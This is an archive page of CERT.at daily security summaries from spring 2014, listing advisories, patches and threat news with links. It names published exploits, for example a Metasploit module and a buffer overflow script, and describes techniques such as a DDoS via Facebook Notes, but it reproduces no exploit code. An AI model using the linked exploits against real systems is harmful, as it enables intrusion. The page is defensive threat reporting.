- Daily - CERT.at

Tageszusammenfassung - Dienstag 6-05-2014
by Daily end-of-shift report 06 May '14

06 May '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 05-05-2014 18:00 − Dienstag 06-05-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** NIST updates Transport Layer Security (TLS) guidelines *** --------------------------------------------- The National Institute of Standards and Technology (NIST) has released an update to a document that helps computer administrators maintain the security of information traveling across their networks. --------------------------------------------- http://www.net-security.org/secworld.php?id=16794 *** Finding Weak Remote Access Passwords on POS Devices *** --------------------------------------------- One of my key take-aways in the Verizon Data Breach Incident Report was that credentials are a major attack vector in 2013. Especially within the POS Intrusions, brute forcing and use of stolen creds was a major problem. --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/05/05/finding-w… *** Analyzing CVE-2014-0515 - The Recent Flash Zero-Day *** --------------------------------------------- Last week, Adobe released an advisory disclosing a new zero-day vulnerability in Flash Player. Looking into the exploit code used in attacks targeting this vulnerability, we found several interesting ties to other vulnerabilities - not all of them for Flash Player, either. To explain this, we will discuss the highlights of how this exploit was performed. --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/H6laAIdlckU/ *** Live from InfoSecurity Europe 2014: The Nitty Gritty of Sandbox Evasion *** --------------------------------------------- Infosecurity Europe 2014 was a great gathering of the top minds in cybersecurity, and in case you missed the event, we were excited to capture live content from the show floor to share with our readers. Over the next few... --------------------------------------------- http://www.fireeye.com/blog/corporate/2014/05/live-from-infosecurity-europe… *** And the Web it keeps Changing: Recent security relevant changes to Browsers and HTML/HTTP Standards, (Tue, May 6th) *** --------------------------------------------- As we all know, web standards are only leaving "draft" status once they start becoming irrelevant. It is a constant challenge to keep up with how web browsers interpret standards and how the standards themselves keep changing. We are just going through one of the perpetual updates for our "Defending Web Applications" class, and I got reminded again about some of the changes we had to make over the last year or so. Autocomplete=Off This weekend we just had yet another post... --------------------------------------------- http://isc.sans.edu/diary.html?storyid=18075&rss *** Watch a bank-raiding ZeuS bot command post get owned in 60 seconds *** --------------------------------------------- RC4? Shoddy PHP coding? You VXers should try a little harder Vid Web thieves may get more than they bargained for if tech pros follow the lead of one researcher - who demonstrated how to hack the systems remote-controlling the infamous ZeuS crime bot in 60 seconds. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/05/06/zeus_pwned_… *** The State of Cryptography in 2014, Part 1: On Fragility and Heartbleed *** --------------------------------------------- It seems like cryptography has been taking a knock recently. This is both good and bad, but is not actually true: cryptography is always under attack, and for that reason constantly evolves. That's bad, but it's good to realize that cryptography needs constant attention. The threat to cryptography can be very disruptive, as we most recently... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/kwDfInwBFvo/ *** Dropbox schließt Referer-Lücke *** --------------------------------------------- In begrenzten Rahmen geteilte Dropbox-Dokumente können beim Klick auf darin enthaltene Links enttarnt werden. Durch den Fix macht der Cloud-Dienstleister allerdings alle existierenden Dokumente unerreichbar. Diese müssen neu geteilt werden. --------------------------------------------- http://www.heise.de/security/meldung/Dropbox-schliesst-Referer-Luecke-21835… *** Security Bulletin: Multiple Vulnerabilities in IBM iNotes (CVE-2013-0589, CVE-2013-0592, CVE-2013-0594, CVE-2013-0595) *** --------------------------------------------- IBM iNotes versions prior to 8.5.3 Fix Pack 6 and 9.0.1 contain multiple security vulnerabilities: CVE-2013-0589, CVE-2013-0592, CVE-2013-0594 and CVE-2013-0595. --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21671622 *** Update for Vulnerability in Juniper Networks Windows In-Box Junos Pulse Client - Version: 1.0 *** --------------------------------------------- Microsoft is announcing the availability of an update for the Juniper Networks Windows In-Box Junos Pulse Client for Windows 8.1 and Windows RT 8.1. The update addresses a vulnerability in the Juniper VPN client by updating the affected Juniper VPN client libraries contained in affected versions of Microsoft Windows. --------------------------------------------- https://technet.microsoft.com/en-us/library/security/2962393 *** Bugtraq: ESA-2014-028: EMC Cloud Tiering Appliance XML External Entity (XXE) and Information Disclosure Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/archive/1/532031 *** Bugtraq: [security bulletin] HPSBGN03010 rev.4 - HP Software Server Automation running OpenSSL, Remote Disclosure of Information *** --------------------------------------------- http://www.securityfocus.com/archive/1/532037 *** Cisco Nexus 1000V Access Control List Bypass Vulnerability *** --------------------------------------------- A vulnerability in Cisco Nexus 1000V switches could allow an unauthenticated, remote attacker to bypass deny statements in access control lists (ACLs) with certain types of Internet Group Management Protocol version 2 (IGMPv2) or IGMP version 3 (IGMPv3) traffic. IGMP version 1 (IGMPv1) is not affected. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Cisco Broadcast Access Center for Telco and Wireless Cross-Site Request Forgery Vulnerability *** --------------------------------------------- A vulnerability in the web framework of the Cisco Broadcast Access Center for Telco and Wireless (BAC-TW) could allow an unauthenticated, remote attacker to perform a cross-site request forgery (CSRF) attack against the Cisco BAC-TW web interface. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Cisco Broadcast Access Center for Telco and Wireless Cross-Site Scripting Vulnerability *** --------------------------------------------- A vulnerability in the web framework of the Cisco Broadcast Access Center for Telco and Wireless (BAC-TW) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the Cisco BAC-TW web interface. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Struts 2.3.16.3 Manipulation Fix *** --------------------------------------------- Topic: Struts 2.3.16.3 Manipulation Fix Risk: Medium Text:The Apache Struts group is pleased to announce that Struts 2.3.16.3 is available as a "General Availability" release.The GA de... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014050026

1 0

Tageszusammenfassung - Montag 5-05-2014
by Daily end-of-shift report 05 May '14

05 May '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 02-05-2014 18:00 − Montag 05-05-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Lnk files in Email Malware Distribution *** --------------------------------------------- Recently I have noticed more use of .lnk files used in malware distribution via email. These files are Windows Shortcut files, typically used for shortcuts on your system, such as on your desktop. The use of .lnk files in emails is not new, but a recent sample caught my eye and I took a closer look. The original email, as it would appear to the recipient, looked like this, purporting to be from an individual at Automatic Data Processing, and containing what looks to be a PDF document and a ZIP --------------------------------------------- http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/VEYzrNB7xos/lnk-files-… *** PHP Updated to Fix OpenSSL Flaws, Other Bugs *** --------------------------------------------- The maintainers of PHP have released two new versions of the scripting language that fix a number of bugs, including a pair of vulnerabilities related to OpenSSL. Versions 5.4.28 and 5.5.12 both contain that important patch, as well as fixes for more than a dozen other vulnerabilities. The fix for the OpenSSL flaws is in both... --------------------------------------------- http://threatpost.com/php-updated-to-fix-heartbleed-other-bugs/105867 *** iOS 7 Update Silently Removes Encryption For Email Attachments *** --------------------------------------------- An anonymous reader writes "Apple has removed encrypted email attachments from iOS 7. Apple said back in June 2010 in regards to iOS 4.0: Data protection is available for devices that offer hardware encryption, including iPhone 3GS and later, all iPad models, and iPod touch (3rd generation and later). Data protection enhances the built-in hardware encryption by protecting the hardware encryption keys with your passcode. This provides an additional layer of protection for your email --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/FyN_d8fBQgo/story01.htm *** Attack Prediction: Malicious gTLD Squatting May Be The Next Big Threat *** --------------------------------------------- Late last year, ICANN began expanding the generic Top-Level Domains (gTLDs). In addition to the standard .COM, .ORG, and .NET TLDs, over 1,300 new names could become available in the next few years. These new gTLDs and internationalized domain names (IDNs) are awesome ideas if you think about the creativity sparked around the names one can possibly register. --------------------------------------------- http://labs.opendns.com/2014/04/23/malicious-gtld-squatting/ *** Spear Phishing Emails: A Psychological Tactic of Threat Actors *** --------------------------------------------- By exploiting network security vulnerabilities, today's generation of threat actors are able to install advanced polymorphic malware to steal data and damage reputations. But their manipulation efforts aren't limited to codes and machines - they extend to people, too. --------------------------------------------- http://www.seculert.com/blog/2014/05/spear-phishing-emails-a-psychological-… *** Evolution of Encrypting Ransomware *** --------------------------------------------- Recently we've seen a big change in the encrypting ransomware family and we're going to shed light on some of the newest variants and the stages of evolution that have led the high profile malware to where it is today. For those that aren't aware of what encrypting ransomware is, its a cryptovirus that encrypts all your data from local hard drives, network shared drives, removable hard drives and USB. The encryption is done using an RSA -2048 asymmetric public key which makes... --------------------------------------------- http://feedproxy.google.com/~r/WebrootThreatBlog/~3/hp9iym0nxN0/ *** Symantec Critical System Protection for Windows Default Policy Bypass *** --------------------------------------------- Revisions None Severity Symantec does not believe that this bypass represents Symantec Critical System Protection (SCSP) vulnerability. The policy bypass ... --------------------------------------------- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se… *** Bugtraq: [ANN][SECURITY] Struts 1 - CVE-2014-0114 -Mitigation Advice Available, Possible RCE Impact *** --------------------------------------------- http://www.securityfocus.com/archive/1/532008 *** Vuln: F5 Networks BIG-IQ Remote Privilege Escalation Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/67191 *** F5 BIG-IQ 4.1.0.2013.0 Password Change Exploit *** --------------------------------------------- Topic: F5 BIG-IQ 4.1.0.2013.0 Password Change Exploit Risk: High Text:## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-fr... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014050012 *** OpenSSL Null Pointer Dereference in do_ssl3_write() Lets Remote Users Deny Service *** --------------------------------------------- http://www.securitytracker.com/id/1030188 *** [webapps] - Seagate BlackArmor NAS - Multiple Vulnerabilities *** --------------------------------------------- http://www.exploit-db.com/exploits/33159 *** Vuln: WordPress NextCellent Gallery Plugin CVE-2014-3123 Multiple Cross Site Scripting Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/bid/67085 *** IBM Tivoli Netcool/Portal vulnerable to CVE-2014-0160 & CVE-2014-0076 *** --------------------------------------------- Security vulnerabilities have been discovered in OpenSSL. CVE(s): CVE-2014-0160 and CVE-2014-0076 Affected product(s) and affected version(s): IBM Tivoli Netcool/Portal 2.1.2 Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21671783 X-Force Database: http://xforce.iss.net/xforce/xfdb/92322 X-Force Database: http://xforce.iss.net/xforce/xfdb/91990 --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_tivoli_netcool_po… *** IBM Security Bulletin: Multiple OpenSSL vulnerabilities in Tivoli Endpoint Manager for Remote Control. (CVE-2013-4353,CVE-2013-6449) *** --------------------------------------------- Security vulnerabilities exist in the version of OpenSSL shipped with Tivoli Endpoint Manager for Remote Control. CVE(s): CVE-2013-4353 and CVE-2013-6449 Affected product(s) and affected version(s): Tivoli Endpoint Manager for Remote Control version 8.2.1. Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin: http://www.ibm.com/support/docview.wss?uid=swg21669040 X-Force Database: http://xforce.iss.net/xforce/xfdb/90201 X-Force --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** Bugtraq: [HP security bulletins] *** --------------------------------------------- http://www.securityfocus.com/archive/1/532002 http://www.securityfocus.com/archive/1/532001 http://www.securityfocus.com/archive/1/532003 http://www.securityfocus.com/archive/1/532004 http://www.securityfocus.com/archive/1/532007 http://www.securityfocus.com/archive/1/532010 http://www.securityfocus.com/archive/1/532011 http://www.securityfocus.com/archive/1/532012 http://www.securityfocus.com/archive/1/532013 http://www.securityfocus.com/archive/1/532014 http://www.securityfocus.com/archive/1/532022 http://www.securityfocus.com/archive/1/532023

1 0

Tageszusammenfassung - Freitag 2-05-2014
by Daily end-of-shift report 02 May '14

02 May '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 30-04-2014 18:00 − Freitag 02-05-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Serious security flaw in OAuth, OpenID discovered *** --------------------------------------------- Attackers can use the "Covert Redirect" vulnerability in both open-source login systems to steal your data and redirect you to unsafe sites. --------------------------------------------- http://www.cnet.com/news/serious-security-flaw-in-oauth-and-openid-discover… *** Ubuntu schließt weitere Lücken im Unity-Sperrbildschirm *** --------------------------------------------- Mit zwei Updates für ihren Unity-Desktop haben die Entwickler der Linux-Distribution weitere Sicherheitsprobleme behoben. Diese hätten es ermöglicht, den Sperrbildschirm unter bestimmten Umständen zu umgehen. --------------------------------------------- http://www.heise.de/security/meldung/Ubuntu-schliesst-weitere-Luecken-im-Un… *** Security Update Released to Address Recent Internet Explorer Vulnerability *** --------------------------------------------- Today, we released a security update to address the Internet Explorer (IE) vulnerability first described in Security Advisory 2963983. This security update addresses every version of Internet Explorer. While we've seen only a limited number of targeted attacks, customers are advised to install this update promptly. The majority of our customers have automatic updates enabled and so will not need to take any action as protections will be downloaded and installed automatically. If... --------------------------------------------- http://blogs.technet.com/b/msrc/archive/2014/05/01/security-update-released… *** Sefnit Botnet Swaps Tor for SSH *** --------------------------------------------- Facebook security researchers spot a Sefnit/Mevade click-fraud and Bitcoin-mining botnet returning to its previous SSH command-and-control communications infrastructure. --------------------------------------------- http://www.darkreading.com/attacks-breaches/sefnit-botnet-swaps-tor-for-ssh… *** Factsheet DNS Amplification *** --------------------------------------------- DDoS-attacks have been hitting headlines the last year. In some of these attacks, attackers use a technique called DNS amplification. This factsheet will help network administrators in preventing DNS amplification attacks via their systems. --------------------------------------------- http://www.ncsc.nl/english/current-topics/news/factsheet-dns-amplification.… *** Apple Fixes Critical Hole in Developer Center *** --------------------------------------------- Apple patched a potentially serious hole in its Developer Center that could have given anyone unfettered access to personal contact information for Apple employees and partners. --------------------------------------------- http://threatpost.com/apple-fixes-critical-hole-in-developer-center/105848 *** All About Windows Tech Support Scams *** --------------------------------------------- *Editors Notes: The purpose of this research was to see exactly how this scam is carried out, and the extent to which it is done. DO NOT TRY THIS AT HOME. We used a clean machine, off network, to monitor the activity of the scammer. Have you ever received a phone call from a tech support person claiming to be from Microsoft, and that your Windows based machine has been found to have a virus on it? These cold calls typically come from loud call centers, and are targeting the uninformed and... --------------------------------------------- http://feedproxy.google.com/~r/WebrootThreatBlog/~3/qw_08fRmr5o/ *** SA-CONTRIB-2014-047 - Zen - Cross Site Scripting *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-047Project: Zen (third-party theme)Version: 7.xDate: 2014-April-30Security risk: Moderately criticalExploitable from: RemoteVulnerability: Cross Site ScriptingDescriptionThe Zen theme is a powerful, yet simple, HTML5 starting theme with a responsive, mobile-first grid design.The theme does not properly sanitize theme settings before they are used in the output of a page. Custom themes that have copied Zens template files (e.g. subthemes) may suffer from this --------------------------------------------- https://drupal.org/node/2254925 *** Cross-Site Scripting Vulnerability in Citrix NetScaler Gateway, formerly Citrix Access Gateway Enterprise Edition *** --------------------------------------------- Severity: Medium Description of Problem A Cross-Site Scripting (XSS) vulnerability has been identified in Citrix NetScaler Gateway, formerly known as Citrix Access Gateway Enterprise Edition... --------------------------------------------- http://support.citrix.com/article/CTX140291 *** Cisco TelePresence TC and TE Bugs Let Remote Users Execute Arbitrary Code and Deny Service and Let Local Users Gain Elevated Privileges *** --------------------------------------------- http://www.securitytracker.com/id/1030181 *** AMTELCO miSecure Vulnerabilities *** --------------------------------------------- Researcher Jared Bird of Allina Health reported multiple vulnerabilities in the AMTELCO miSecureMessage (MSM) medical messaging system. AMTELCO has an update available to all customers that mitigates the vulnerabilities. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-121-01 *** WordPress plugin EZPZ One Click Backup Command Injection *** --------------------------------------------- Topic: WordPress plugin EZPZ One Click Backup Command Injection Risk: High Text:Product: WordPress plugin EZPZ One Click Backup Vulnerability type: CWE-78 OS Command Injection Vulnerable versions: 12.03.10... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014050008 *** WordPress leaflet maps marker plugin SQL Injection Vulnerability *** --------------------------------------------- Topic: WordPress leaflet maps marker plugin SQL Injection Vulnerability Risk: Medium Text: # # Exploit Title: WordPress leaflet maps marker plugin SQL Injection Vulnerability # # Author: neo.hapsis #memb... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014050010

1 0

Tageszusammenfassung - Mittwoch 30-04-2014
by Daily end-of-shift report 30 Apr '14

30 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 29-04-2014 18:00 − Mittwoch 30-04-2014 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** PHP Callback Functions: Another Way to Hide Backdoors *** --------------------------------------------- We often find new techniques employed by malware authors. Some are very interesting, others are pretty funny, and then there are those that really stump us in their creativity and effectiveness. This post is about the latter. Everyone who writes code in PHP knows what the eval() function is .. --------------------------------------------- http://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-b… *** [papers] - Introduction to Android Malware Analysis *** --------------------------------------------- http://www.exploit-db.com/download_pdf/33093 *** Xen HVMOP_set_mem_type Page Transition Flaw Lets Local Users on the Guest System Cause Denial of Service Conditions on the Host System *** --------------------------------------------- http://www.securitytracker.com/id/1030160 *** "Bypassing endpoint protections" @ BSides London *** --------------------------------------------- This week I presented at BSides London. The talk is titled "Layers on layers: bypassing endpoint protection". The purpose of this talk is to reiterate on the (well-known) common weakness of most endpoint protection products - their reliance on kernel integrity. Once the attacker achieves arbitrary code execution in the kernel, there .. --------------------------------------------- http://labs.bromium.com/2014/04/29/bypassing-endpoint-protections-bsides-lo… *** Cisco WebEx Meetings Server Cross-Site Request Forgery Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Be on the Lookout: Odd DNS Traffic, Possible C&C Traffic, (Wed, Apr 30th) *** --------------------------------------------- We got an email from one of our readers, including an interesting port 53 packet. While Wireshark and TCPDump try to decode it as DNS, it is almost certainly not DNS. The payload of the packet is .. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=18047&rss *** Mozilla Thunderbird Multiple Flaws Let Remote Users Execute Arbitrary Code, Deny Service, and Conduct Cross-Site Scripting Attacks and Local Users Gain Elevated Privileges *** --------------------------------------------- http://www.securitytracker.com/id/1030165 *** Mozilla Firefox Multiple Flaws Let Remote Users Execute Arbitrary Code, Deny Service, and Conduct Cross-Site Scripting Attacks and Local Users Gain Elevated Privileges *** --------------------------------------------- http://www.securitytracker.com/id/1030163 *** [2014-04-30] SQL injection and XSS vulnerabilities in Typo3 si_bibtex extension *** --------------------------------------------- By exploiting the SQL injection vulnerability in the Typo3 extension "si_bibtex", an attacker is able to gain full access to the Typo3 database. Depending on the location where the extension is used in the web application, this may be possible by an unauthenticated attacker. Furthermore, it is affected by persistent XSS. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** Symantec Encryption Desktop (PGP) Memory Access Flaws Let Remote Users Deny Service *** --------------------------------------------- http://www.securitytracker.com/id/1030170 *** Friends dont let friends use Internet Explorer - advice from US, UK, EU *** --------------------------------------------- IE 6 to 11 at risk of hijacking, patch coming - but not for XP Microsoft has warned of a new security flaw in all versions of its Internet Explorer web browser for Windows PCs. A patch has yet to be released for the crocked code. --------------------------------------------- www.theregister.co.uk/2014/04/27/oops_we_did_it_again_microsoft_warns_of_ie… *** Botnetz für Altcoin-Mining nutzt Lücke in Nagiosüberwachung aus *** --------------------------------------------- Eine kürzlich veröffentlichte Sicherheitslücke im Netzwerkmonitor Nagios wird offenbar bereits ausgenutzt. Betroffen sind weit über 1000 weltweit verteilte Server, die für Mining-Zwecke missbraucht werden. --------------------------------------------- http://www.heise.de/newsticker/meldung/Botnetz-fuer-Altcoin-Mining-nutzt-Lu… *** Neuer Erpressungs-Trojaner verschlüsselt mit RSA-2048 *** --------------------------------------------- Es häufen sich Berichte über infizierte Windows-Systeme, auf denen ein Schadprogramm Dateien verschlüsselt und nur gegen Zahlung eines Lösegelds von 500 Euro wieder freigibt. Die sind via Tor in Bitcoins zu entrichten. --------------------------------------------- http://www.heise.de/security/meldung/Neuer-Erpressungs-Trojaner-verschluess… *** Protection strategies for the Security Advisory 2963983 IE 0day *** --------------------------------------------- We've received a number of customer inquiries about the workaround steps documented in Security Advisory 2963983 published on Saturday evening. We hope this blog post answers those questions. Steps you can take to stay safe The security advisory lists several options customers can take to stay safe. Those options are .. --------------------------------------------- http://blogs.technet.com/b/srd/archive/2014/04/30/protection-strategies-for… *** Six infosec tips I learned from Game of Thrones *** --------------------------------------------- In Westeros - the land of dark knights, backstabbing royals, dragons, wildings, wargs, red witches, and White Walkers - even the youngest ones have to learn basic self-defense if they're to have any hope of surviving the cruel fictional world imagined by A Game of Thrones (GOT) author, George R. R. Martin. And so too, must every CISO and security pro learn the latest information security best practices if they're to survive today's Internet threat landscape. --------------------------------------------- http://www.net-security.org/article.php?id=2001&p=1

1 0

Tageszusammenfassung - Dienstag 29-04-2014
by Daily end-of-shift report 29 Apr '14

29 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 28-04-2014 18:00 − Dienstag 29-04-2014 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Update for Vulnerabilities in Adobe Flash Player in Internet Explorer - Version: 23.0 *** --------------------------------------------- https://technet.microsoft.com/en-us/library/security/2755801 *** Ubuntu 14.04 lockscreen bypass, (Mon, Apr 28th) *** --------------------------------------------- Upgraded to Ubuntu 14.04? Hold down enter to bypass the lockscreen (what is old is new again): https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572 …" The reporter indicates that he was running Ubuntu 14.04 with all the packages updated. When the screen is locked with password, if holding ENTER, after some seconds the screen freezes and the lock screen .. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=18039 *** Cisco ASA DHCPv6 Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Researchers warn of resurgent Sefnit malware *** --------------------------------------------- Botnet returns using new tactics A malware infection which drew headlines January has returned and is using new techniques to infect and spread amongst users. --------------------------------------------- www.theregister.co.uk/2014/04/29/researchers_warn_of_resurgent_sefnit_malwa… *** Citrix NetScaler Application Delivery Controller and NetScaler Gateway Multiple Security Updates *** --------------------------------------------- A number of security vulnerabilities have been identified in the management component of the Citrix NetScaler Application Delivery Controller .. --------------------------------------------- http://support.citrix.com/article/CTX140651 *** Massenhack bei AOL: Millionen Nutzer betroffen *** --------------------------------------------- Unbekannte verschaffen sich Zugang zu privaten Informationen - Unternehmen fordert zum ändern des Passworts auf --------------------------------------------- http://derstandard.at/1397521927406 *** The FireEye Advanced Threat Report 2013: European Edition *** --------------------------------------------- We recently published the 2013 FireEye Advanced Threat Report during RSA Conference, providing a global overview of the advanced attacks that FireEye discovered last year. We are now drilling that global analysis down into the European threat .. --------------------------------------------- http://www.fireeye.com/blog/corporate/2014/04/the-fireeye-advanced-threat-r… *** Cybercriminals Take Advantage Of Heartbleed With Spam *** --------------------------------------------- Since news about Heartbleed broke out earlier this month, the Internet has been full of updates, opinions and details about the vulnerability, with personalities ranging from security experts to celebrities talking about it. Being as opportunistic as they are, cybercriminals have taken notice of this and .. --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/RKpGQ6-RSA8/ *** Q1 2014 Mobile Threat Report *** --------------------------------------------- Our Mobile Threat Report for Q1 2014 is out! Heres a couple of the things we cover in it:The vast majority of the new threats found was on Android (no surprise there), which accounted for 275 out of 277 new families we saw in this period, leaving 1 new malware apiece on iOS and Symbian.In Q1, .. --------------------------------------------- http://www.f-secure.com/weblog/archives/00002699.html *** 6 free network vulnerability scanners *** --------------------------------------------- Vulnerability scanners can help you automate security auditing and can play a crucial role in your IT security. They can scan your network and websites for up to thousands of different security risks, produce a prioritized list of those you should patch, describe the vulnerabilities, and give steps on how to remediate them. Some can even automate the patching process. While these tools can .. --------------------------------------------- http://www.csoonline.com/article/2148841/data-protection/6-free-network-vul… *** Hashcat-Utils v1.0 Released *** --------------------------------------------- Hashcat-utils are a set of small utilities that are useful in advanced password cracking. They all are packed into multiple stand-alone binaries. All of these utils are designed to execute only one specific function. Since they all work with STDIN and STDOUT you can group them into chains. The programs are available for Linux and Windows on both 32 bit and 64 bit architectures. The programs are also available as open source. --------------------------------------------- http://www.toolswatch.org/2014/04/hashcat-utils-v1-0-released/

1 0

Tageszusammenfassung - Montag 28-04-2014
by Daily end-of-shift report 28 Apr '14

28 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 25-04-2014 18:00 − Montag 28-04-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** Using Facebook Notes to DDoS any website *** --------------------------------------------- Facebook Notes allows users to include tags. Whenever a tag is used, Facebook crawls the image from the external server and caches it. Facebook will only cache the image once however using random get parameters the cache can be by-passed and the feature can be abused to cause a huge HTTP GET flood. --------------------------------------------- http://chr13.com/2014/04/20/using-facebook-notes-to-ddos-any-website/ *** Mozilla entschlackt Zertifkats-Überprüfung *** --------------------------------------------- Statt 81.865 sind jetzt nur noch 4167 Zeilen Code zum überprüfen von SSL-Zertifikaten nötig. Wer Sicherheitslücken in darin findet, erhält einen üppigen Finderlohn. --------------------------------------------- http://www.heise.de/security/meldung/Mozilla-entschlackt-Zertifkats-Ueberpr… *** Examining the Heartbleed-based FUD thats pitched to the public *** --------------------------------------------- The Heartbleed vulnerability has created a massive news cycle, and generated technical risk-based discussions that might actually do some good. But some of these discussions boggle the mind, spreading misinformation in order to generate clicks or sales.When security issues hit the mass media, such as Heartbleed, there is a good deal of Fear, Uncertainty, and Doubt - better known as FUD - that gets promoted on the airwaves and in print. --------------------------------------------- http://www.csoonline.com/article/2148461/application-security/examining-the… *** Sicherheitslücke bei Messaging-App Viber aufgedeckt *** --------------------------------------------- Bilder, Videos und Standortdaten, die man mit der Messaging-App Viber übermittelt, werden unverschlüsselt auf Servern gespeichert. Der Zugang dazu ist äußerst einfach. --------------------------------------------- http://futurezone.at/digital-life/sicherheitsluecke-bei-messaging-app-viber… *** Microsoft Warns of Attacks on IE Zero-Day *** --------------------------------------------- Microsoft is warning Internet Explorer users about active attacks that attempt to exploit a previously unknown security flaw in every supported version of IE. The vulnerability could be used to silently install malicious software without any help from users, save for perhaps merely browsing to a hacked or malicious site. --------------------------------------------- http://feedproxy.google.com/~r/KrebsOnSecurity/~3/PUm3t0AZZzc/ *** Neue Internet-Explorer-Lücke wird zum Ernstfall für Windows XP *** --------------------------------------------- Wird bereits aktiv ausgenutzt - Kein Update mehr für XP, andere Betriebssystemversion derzeit ebenfalls noch ungeschützt --------------------------------------------- http://derstandard.at/1397521804143 *** Biggest EU cyber security exercise to date: Cyber Europe 2014 taking place today *** --------------------------------------------- Today, 28 April 2014, European countries kick off the Cyber Europe 2014 (CE2014). CE2014 is a highly sophisticated cyber exercise, involving more than 600 security actors across Europe. --------------------------------------------- http://www.enisa.europa.eu/media/press-releases/biggest-eu-cyber-security-e… *** Cisco IOS XE Software Malformed L2TP Packet Vulnerability *** --------------------------------------------- A vulnerability in the Layer 2 Tunneling Protocol (L2TP) module of Cisco IOS XE on Cisco ASR 1000 Series Routers could allow an authenticated, remote attacker to cause a reload of the processing ESP card. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Security updates available for Adobe Flash Player (APSB14-13) *** --------------------------------------------- A Security Bulletin (APSB14-13) has been published regarding security updates for Adobe Flash Player. These updates address a critical vulnerability, and Adobe recommends users update their product installations to the latest versions --------------------------------------------- http://blogs.adobe.com/psirt/?p=1093

1 0

Tageszusammenfassung - Freitag 25-04-2014
by Daily end-of-shift report 25 Apr '14

25 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 24-04-2014 18:00 − Freitag 25-04-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Number of Sites Vulnerable to Heartbleed Plunges by Two-Thirds *** --------------------------------------------- Two weeks ago, we talked about how many sites in the top 1 million domains (as judged by Alexa) were vulnerable to the Heartbleed SSL vulnerability. How do things stand today? Figure 1. Sites vulnerable to Heartbleed as of April 22 Globally, the percentage of sites that is vulnerable to Heartbleed has fallen by two-thirds,... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/qyKz0tQVjAY/ *** Fareit trojan observed spreading Necurs, Zbot and CryptoLocker *** --------------------------------------------- The Necurs and Zbot trojans, as well as CryptoLocker ransomware, has been observed by researchers as being spread through another trojan, known as Fareit. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/XrcbQ8kwwQo/ *** It's Insanely Easy to Hack Hospital Equipment *** --------------------------------------------- When Scott Erven was given free reign to roam through all of the medical equipment used at a chain of large midwest health care facilities, he knew he would find security problems with the systems -- but he wasnt prepared for just how bad it would be. --------------------------------------------- http://feeds.wired.com/c/35185/f/661467/s/39be98e1/sc/36/l/0L0Swired0N0C20A… *** Update für Windows 7 außer der Reihe *** --------------------------------------------- Windows-7-Nutzer bekommen von der Update-Funktion derzeit ein Update mit der Nummer 2952664 angeboten. Irritierend daran: Es erscheint außer der Reihe und Microsoft verrät auch nicht, welche Probleme das Update genau behebt. --------------------------------------------- http://www.heise.de/newsticker/meldung/Update-fuer-Windows-7-ausser-der-Rei… *** Acunetix 8 Scanner Buffer overflow *** --------------------------------------------- Topic: Acunetix 8 Scanner Buffer overflow Risk: High Text:#!/usr/bin/python # Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit # Version: 8 # Build: 20120704 # Test... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014040162 *** Security Notice-Statement on Patch Bypassing of Apache Struts2 *** --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-notices… *** Hitachi Multiple Products OpenSSL 